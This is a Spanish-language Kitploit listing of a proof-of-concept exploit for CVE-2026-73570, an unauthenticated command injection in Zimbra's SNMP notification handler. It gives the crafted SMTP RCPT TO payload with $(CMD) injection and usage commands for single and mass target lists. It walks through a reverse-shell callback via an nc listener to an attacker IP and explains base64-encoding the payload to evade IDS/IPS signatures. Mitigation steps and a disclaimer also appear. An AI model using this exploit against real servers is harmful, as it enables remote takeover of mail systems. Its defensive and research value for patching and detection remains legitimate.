Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gabrielunknown/cve-2026-73570
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP Notification Inyección de Comandos del Sistema Operativo — RCE no autenticado mediante exploit SMTP (PoC)

Ver Repositorio
1hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-73570 — Exploit de ejecución remota de código en la notificación SNMP de Zimbra ZCS (PoC)

Ejecución remota de código no autenticada mediante inyección de comandos del sistema operativo en el manejador de notificaciones SNMP de Zimbra Collaboration Suite.


Resumen

CampoValor
CVECVE-2026-73570
CVSS 3.18.9 ALTO — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo
AfectadosZimbra ZCS < 10.1.20 (con zimbra-snmp instalado)
Corregido enZCS 10.1.20 — julio de 2026
CISA KEVAñadido el 2026-08-21 (plazo de remediación FCEB: 2026-08-24)
Autenticación requeridaNinguna
Ejecución comoUsuario del sistema operativo zimbra

Causa raíz

El paquete opcional zimbra-snmp incluye una regla de swatchdog que monitorea /var/log/zimbra.log en busca de líneas que coincidan con:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

Cuando se encuentra una coincidencia, swatchdog pasa el campo <NAME> capturado directamente al script de shell de notificación SNMP sin ninguna sanitización.

Un atacante no autenticado puede inyectar una entrada de registro manipulada enviando un comando SMTP RCPT TO especialmente formado. Utilizando una parte local entre comillas según RFC 5321, los metacaracteres de shell — p. ej. $(...) — se incrustan dentro de <NAME> y se ejecutan cuando swatchdog procesa la línea de registro resultante.


Precondiciones

Las tres condiciones deben cumplirse en el objetivo para que la vulnerabilidad sea explotable:

  • El paquete zimbra-snmp está instalado
  • Las notificaciones SNMP están habilitadas (snmp_notify = true)
  • El servicio swatchdog está en ejecución

Flujo del ataque

root@kitploit:~
Atacante                          MTA de Zimbra
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── registra datos de RCPT TO ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog coincide con el
   │                                  │                         patrón, extrae
   │                                  │                         $(CMD), ejecuta
   │◄─────────── callback de shell ───────────────────────────────────────┘
  1. Conéctese al puerto 25 / 465 / 587.
  2. Envíe una conversación SMTP estándar con el RCPT TO armado.
  3. Zimbra registra los datos de la dirección independientemente de si se acepta o rechaza.
  4. swatchdog coincide con el patrón de registro y extrae el $(CMD) inyectado.
  5. El manejador SNMP ejecuta CMD como el usuario del sistema operativo zimbra.

Exploit

Requisitos

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Objetivo único

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <TU_IP> -R 4444

Lista de objetivos

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <TU_IP> -R 4444

targets.txt — un host por línea, :puerto opcional, las líneas que comienzan con # se ignoran:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# comentario ignorado

Todas las opciones

IndicadorLargoPredeterminadoDescripción
-H--host—Nombre de host o IP del objetivo único
-f--file—Archivo que contiene la lista de objetivos
-p--port587Puerto SMTP predeterminado
-r--rhost—Su IP para el callback de shell inverso
-R--rport4444Puerto del listener
-t--timeout15Tiempo de espera del socket en segundos
-S--ssloffTLS directo (auto-habilitado en el puerto 465)
-v--verboseoffImprime el diálogo SMTP completo
-L--logfile—Escribe el registro de la sesión en un archivo
-h--help—Muestra la ayuda

Ejemplo completo

root@kitploit:~
# Terminal 1 — iniciar listener
nc -lvnp 4444

# Terminal 2 — ejecutar exploit
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Técnica del payload

El comando de shell inverso se codifica en base64 antes de la inyección:

root@kitploit:~
echo <b64>|base64 -d|bash

Esto evita que IDS/IPS coincidan con firmas de texto plano como /dev/tcp, bash -i o nc -e. El blob codificado se inyecta como $(...) dentro de la parte local entre comillas de RCPT TO, lo que desencadena la ejecución en el servidor cuando swatchdog procesa la entrada de registro.


Mitigación

AcciónDetalle
ParcheActualice a Zimbra ZCS ≥ 10.1.20
Deshabilitar notificación SNMPzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Eliminar paqueteapt remove zimbra-snmp / yum remove zimbra-snmp
Controles de redRestrinja el SMTP entrante (25/465/587) a relays de confianza cuando sea operativamente factible

Referencias

  • NVD — CVE-2026-73570
  • Avisos de seguridad de Zimbra
  • Vulnerabilidades explotadas conocidas de CISA — CVE-2026-73570
  • Aviso de CERT.pl
  • BiuTrap/CVE-2026-73570

Descargo de responsabilidad

Esta prueba de concepto se publica únicamente para pruebas de seguridad autorizadas, investigación académica y fines defensivos.
Ejecutarla contra sistemas que no posee o para los cuales no tiene permiso escrito explícito para probar es ilegal.
El autor no asume ninguna responsabilidad por el uso indebido o los daños causados por esta herramienta.


Descargar herramienta